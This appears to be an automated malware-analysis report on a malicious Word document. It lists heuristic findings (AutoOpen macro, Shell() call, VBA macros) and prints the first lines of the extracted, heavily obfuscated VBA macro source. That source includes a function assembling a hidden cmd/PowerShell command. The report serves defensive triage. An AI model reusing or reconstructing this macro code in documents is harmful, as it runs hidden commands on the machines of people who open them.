MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and triggers the execution of the Shell() function, which is a critical finding. The macro appears to be obfuscated, making it difficult to determine the exact payload or destination. No specific family could be identified.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 69347 bytes |
SHA-256: ecd7f27615a323ba76e3d7b491a2f17e4c1309fa577cf2450063d9807d6aa92f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "dhrKNljHHQjoKW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim sEamSI(2)
sEamSI(0) = Right(jzwZPn + orEzidXbtcAYYlMB + ivQiwAiO, 587) + Right(WbPqQ + naDLYaDjbZnDHGvnU + zIwYQ, 406)
sEamSI(1) = MidB(hIMCOrr + kEuUCoSaNUJucEauOAQFL + RbAXQQjZ, 63, 320) + Left(zTGGpHX + fIcfRwHUwjZIWDwDZVZ + zdaIuaz, 768) + Left(mTXsz + CiRFKownmKTBQGUoVwcuAv + kvvKz, 702) + Mid(qVjpoi + nnURrwjNLzcaKEnMvs + jDzQw, 203, 796)
Dim SzwQa(1)
SzwQa(0) = MidB(udfsB + zpOmYSfmYfawuhDwdw + CGvBzrU, 258, 566) + MidB(zCfuAT + KalzpOWwpEILLjdRibR + Jaucc, 748, 59)
Dim wtDRHG(2)
wtDRHG(0) = MidB(VWYZHvG + OXCCYsipPWmtbPiwIuZ + zGvmdBf, 770, 717) + Right(farZBo + rNwbKlsQIiZoAVwcFnki + mGBYEzU, 236) + MidB(TDilBfJ + CjkiEoHLcdHfXiwUMKON + CwnLba, 581, 417) + MidB(CCbwjzsI + YnIpNWjCVnVDJCqkCzldwmV + kOSGdCwO, 815, 971)
wtDRHG(1) = MidB(qoThK + RttizYhfJLCsSjEnsBNnzUv + KSwlG, 422, 717) + Mid(jShwXJFi + mHkfiowEGtKDUVNZwW + MEkAwiD, 660, 406)
Dim jVGNan(2)
jVGNan(0) = MidB(zOzmm + CEWlARWNakOuPXLFvFh + QiHzdia, 929, 654) + MidB(toDzaJ + mqZOpwtZhZnUBnVYjhAo + BGhTMfmz, 760, 333)
jVGNan(1) = Left(QSBkEzPI + sAidQkXMBtZnqMGnqjju + rXzdB, 486) + Right(IOjliP + afrzqfYwkNUIGDXY + jlcVBf, 541) + MidB(jmmQFE + PMMbiQLwvFZhnBrtPbpA + dDbiKHEE, 427, 167) + MidB(zFUQS + WFnVvwPKnFZMdNkUlo + LCfnDm, 489, 972)
Dim WkZbc(2)
WkZbc(0) = MidB(QnLGfAcZ + MWnqqznbWiPffoFkTcc + LnCWUODH, 479, 164) + MidB(Hcfmm + WMAIfKLWpHzjvCuQANSb + zMNMaz, 638, 418) + Left(nKfWc + hRRIzTzcrVEkKkihw + rZiHsAUW, 464) + Right(KlJYOzHu + FLQpzCAvuMDkZriqcFTjOb + lWiaCjw, 733)
WkZbc(1) = Right(RtzUbj + HAjjjJvmrlfBOjYFUJUm + QZSVIdj, 733) + MidB(RrEmZi + GAiMDMWFiaVmOTkcFi + tStPj, 193, 745) + Mid(hYfnvEVG + bFMNhvBSpBswptJz + QwkoOiIH, 287, 271) + MidB(bmwhF + oITqoGnoFKLHLHb + VmtDbi, 326, 812)
nizIDLKsU (KeyString(Lmqijk + tQQizWOE + 3 + 8 + 56 + wTvVkbT + Lclov) + RvJfEkqv + uTfQp + KeyString(SLQUpC + QZjPHc + 3 + 9 + 65 + DETubbNd + jjzktW) + fEjIcZcBk + EnMwtrtaPWE + HvYYK + phjABfnuR + NwHFIjz + ozlwn + vdHuT)
Dim wlEHD(1)
wlEHD(0) = MidB(PuaRk + vXOulZXZtJJTSViz + UXaYSw, 669, 642) + Right(fiLnI + JzobLLwtEvbFimdzoWTZqp + ifPTLDYZ, 8) + Mid(IMciqrnF + tBdMIbpXzlwTUljYjJ + pRnMrc, 660, 73) + Right(YldlH + wjcQGJsQfGDjHlouV + MptBuui, 706)
Dim BNuTb(1)
BNuTb(0) = Left(jsqBO + JtQimwPXNUOzLaSrzaRW + NDIEvzY, 618) + Mid(krMhGhl + zNpZkjPXQosWtEOKbPviFt + OllSoa, 806, 443) + MidB(iXYfOB + tOwIITaORDiaMBzmzz + WoAOrmv, 29, 887) + Left(zwVFd + OMYTmpzwiRPSFbUHwboS + Lifiq, 913)
Dim jwiZJz(2)
jwiZJz(0) = MidB(uEazb + dOdrwiNOWnPwZfF + jskwmF, 737, 511) + MidB(PNtwR + tcRwjCVdiswszdTlifF + HCGHadG, 964, 351) + Right(cLYAYhc + tifNWNPfBZnlqqvuzXud + PnFTM, 929) + MidB(PjdWskMO + QvzqUiKmhIEzFGaKKS + qWJMKU, 211, 659)
jwiZJz(1) = Left(cNPIZSWA + VoLhcmdmERYJULV + bzXIWmEz, 644) + MidB(KQvACKck + hwhdcDqEHBsMiVQqzpwi + iPYGJ, 668, 715) + MidB(tDqit + zczlREflHRtlRQWuoSs + QsEoRa, 459, 324) + MidB(rTffpiC + BRrqPIZHzvuFhYzXNKk + ZARlkhQ, 719, 503)
End Sub
Attribute VB_Name = "HZCpjfAPRLpmm"
Function fEjIcZcBk()
ujKvFWHX = "d \\\\ \//\/ \/ " + "/V:/C" + """" + "set {;],=207a " + "a072 270a 207a " + "a207 72a0 702a 270a" + " 0a72 0a27 027a 7a" + "02 07a2 72"
RhFDwQdL = "0a 720a 207a 70a2" + " 027a}027a" + "}702a{72a0h" + "a270c07a2t" + "a702a07a2c20a7}20" + "7a;a702ka720a027ae07"
JPLHY = "2ar27a0b02a7;7a2" + "0ia207a027ao270" + "a$270a 7a20" + "m2a07e70a2t7" + "a02I0a27-7" + "a20e7a20k0a27"
fEjIcZcBk = ujKvFWHX + RhFDwQdL + JPLHY
Dim TBosin(1)
TBosin(0) = MidB(tRNjf + YRLLWqwwbjsHCIXsqK + XNkwli, 403, 565) + Right(DuWzPf + mhIdPKblELnbGhzlsXSbzd + qlCssDwX, 187) + MidB(waWAOQRS + MZLStwWUKAsKkLTjfi + tzLVXDL, 624, 210) + MidB(dLqaw + CEBtFPzBEzjOOSTiazRud + IGoWkV, 533, 114)
Dim dOPUA(1)
dOPUA(0) = MidB(obrdF + JjifUwnkrjoRYJpSpCiA + EXCRUIdf, 270, 30) + MidB(THDZp + lLppvDonKwaftLuVPjF +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.